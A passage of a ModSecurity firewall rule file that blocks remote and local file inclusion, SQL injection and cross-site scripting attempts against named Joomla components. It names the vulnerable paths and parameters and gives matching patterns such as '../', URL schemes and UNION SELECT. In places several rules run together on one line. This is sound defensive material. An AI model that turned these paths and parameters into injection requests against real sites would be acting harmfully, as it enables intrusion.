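SecRule ARGS:mosConfig_absolute_path "(?i:(?:^|mosConfig_absolute_path=)\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rwcards mosConfig_absolute_path Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2011847) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jomestate Parameter Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /real_estate/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011847,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jomestate Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_jomestate" "chain"
SecRule ARGS:task "(?i:(?:^|task=)\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jomestate Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2011935) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component joomlaXplorer admin.joomlaxplorer.php File Inclusion Attempt
SecRule REQUEST_LINE "@contains /administrator/components/com_joomlaxplorer/admin.joomlaxplorer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011935,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component joomlaXplorer admin.joomlaxplorer.php File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:mosConfig_absolute_path "(?i:(?:^|mosConfig_absolute_path=)\s*(ftps?|https?|php)\x3a\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component joomlaXplorer admin.joomlaxplorer.php File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2011929) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_banners banners.class.php Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /components/com_banners/banners.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011929,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_banners banners.class.php Remote File inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:mosConfig_absolute_path "(?i:(?:^|mosConfig_absolute_path=)\s*(ftps?|https?|php)\x3a\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_banners banners.class.php Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012014,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule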
REQUEST_LINE "@contains option=com_jimtawl" "chain" SecRule ARGS:task "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012022) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012022,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_cbe" "chain" SecRule REQUEST_LINE "@contains task=userProfile" "chain" SecRule ARGS:tabname "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012099) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component Billy Portfolio catid Parameter Blind SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012099,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component Billy Portfolio catid Parameter Blind SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_billyportfolio" "chain" SecRule REQUEST_LINE "@contains view=billyportfolio" "chain" SecRule ARGS:catid "(?i:and.*if\()" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component Billy Portfolio catid Parameter Blind SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012131) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Seyret Video com_seyret Component Blind SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012131,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Seyret Video com_seyret Component Blind SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_seyret" "chain" SecRule REQUEST_LINE "@contains task=videodirectlink" "chain" SecRule ARGS:id "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Seyret Video com_seyret Component Blind SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012166) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_xmovie/helpers/img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012166,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012345) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012345,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_frontenduseraccess" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012357) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_xgallery/helpers/img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012357,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012369) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 
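Joomla swMenuPro ImageManager.php Remote File Inclusion Attempt
# Chain: the request line names ImageManager.php, the request line contains
# "GET ", and the mosConfig_absolute_path value begins with an ftp(s), http(s)
# or php scheme followed by ":/".
# ARGS:<name> is the parameter value only, so the last link no longer expects
# the literal "mosConfig_absolute_path=" inside the value; the scheme is
# anchored to the start of the value instead. The same correction is applied to
# rules 2012659, 2012666, 2012703 and 2012704 below, and to the mosmsg pattern
# of rule 2012430.
# NOTE(review): the t: list is declared on the chain starter only; confirm
# whether the last link of each chain needs its own transformations.
SecRule REQUEST_LINE "@contains /com_swmenupro/ImageManager/Classes/ImageManager.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012369,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla swMenuPro ImageManager.php Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:mosConfig_absolute_path "(?i:^\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla swMenuPro ImageManager.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /administrator/components/com_xcloner-backupandrestore/cloner.cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012427,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,46582'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:config "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012430) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XCloner Component index2.php mosmsg Parameter Cross Site Scripting Attempt
# The last link inspects the mosmsg value itself, so the "mosmsg=" prefix is
# removed from the pattern; the keyword list is unchanged.
SecRule REQUEST_LINE "@contains /administrator/components/com_xcloner-backupandrestore/index2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012430,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XCloner Component index2.php mosmsg Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46582'"
    SecRule ARGS:mosmsg "(?i:.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XCloner Component index2.php mosmsg Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_doqment Remote File inclusion Attempt
# Last link matches the scheme at the start of the parameter value.
SecRule REQUEST_LINE "@contains admin.ponygallery.html.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012659,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_doqment Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_doqment" "chain"
    SecRule ARGS:mosConfig_absolute_path "(?i:^\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_doqment Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012666) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla component smartformer Remote File Inclusion Attempt
# Last link matches the scheme at the start of the parameter value.
SecRule REQUEST_LINE "@contains /components/com_smartformer/smartformer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012666,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla component smartformer Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:mosConfig_absolute_path "(?i:^\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla component smartformer Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012667) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component Media Mall Factory Blind SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012667,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component Media Mall Factory Blind SQL Injection Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_mediamall" "chain"
    SecRule ARGS:category "(?i:and.*substring\()" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component Media Mall Factory Blind SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012697) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla virtuemart Blind SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012697,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla virtuemart Blind SQL Injection Attempt',tag:'web-application-attack'"
    SecRule ARGS_NAMES "(?i:page)" "chain"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_virtuemart" "chain"
    SecRule REQUEST_LINE "@contains substring" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla virtuemart Blind SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012703) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_latestprod module Remote File inclusion Attempt
# Last link matches the scheme at the start of the parameter value.
SecRule REQUEST_LINE "@contains /modules/mod_virtuemart_latestprod/mod_virtuemart_latestprod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012703,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_latestprod module Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:mosConfig_absolute_path "(?i:^\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_latestprod module Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012704) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_featureprod module Remote File inclusion Attempt
# Last link matches the scheme at the start of the parameter value.
SecRule REQUEST_LINE "@contains /modules/mod_virtuemart_featureprod/mod_virtuemart_featureprod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012704,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_featureprod module Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:mosConfig_absolute_path "(?i:^\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_featureprod module Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012829) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_hello SELECT FROM SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012829,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_hello SELECT FROM SQL Injection Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_hello" "chain"
    SecRule ARGS:secid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_hello SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012830) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_hello DELETE FROM SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012830,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_hello DELETE FROM SQL Injection Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_hello" "chain"
    SecRule ARGS:secid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_hello DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# 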
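(2012831) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_hello UNION SELECT SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012831,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_hello UNION SELECT SQL Injection Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_hello" "chain"
    SecRule ARGS:secid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_hello UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012832) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_hello INSERT INTO SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012832,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_hello INSERT INTO SQL Injection Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_hello" "chain"
    SecRule ARGS:secid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_hello INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_hello UPDATE SET SQL Injection Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012833,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_hello UPDATE SET SQL Injection Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_hello" "chain"
    SecRule ARGS:secid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_hello UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012837) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_mgm Remote File inclusion Attempt
# Chain: the request line names help.mgm.php, the request line contains "GET ",
# and the mosConfig_absolute_path value begins with an ftp(s), http(s) or php
# scheme followed by ":/".
# ARGS:<name> is the parameter value only, so the last link no longer expects
# the literal "mosConfig_absolute_path=" inside the value; the scheme is
# anchored to the start of the value instead.
# NOTE(review): the t: list is declared on the chain starter only; confirm
# whether the last link needs its own transformations.
SecRule REQUEST_LINE "@contains /components/com_mgm/help.mgm.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012837,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_mgm Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:mosConfig_absolute_path "(?i:^\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_mgm Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2012948) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012948,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion 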
Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jmsfileseller" "chain" SecRule ARGS:view "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2012995) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012995,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_people" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS People Joomla Component controller Parameter Local File Inclusion Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2013433) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013433,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jfeedback" "chain" SecRule ARGS:controller 
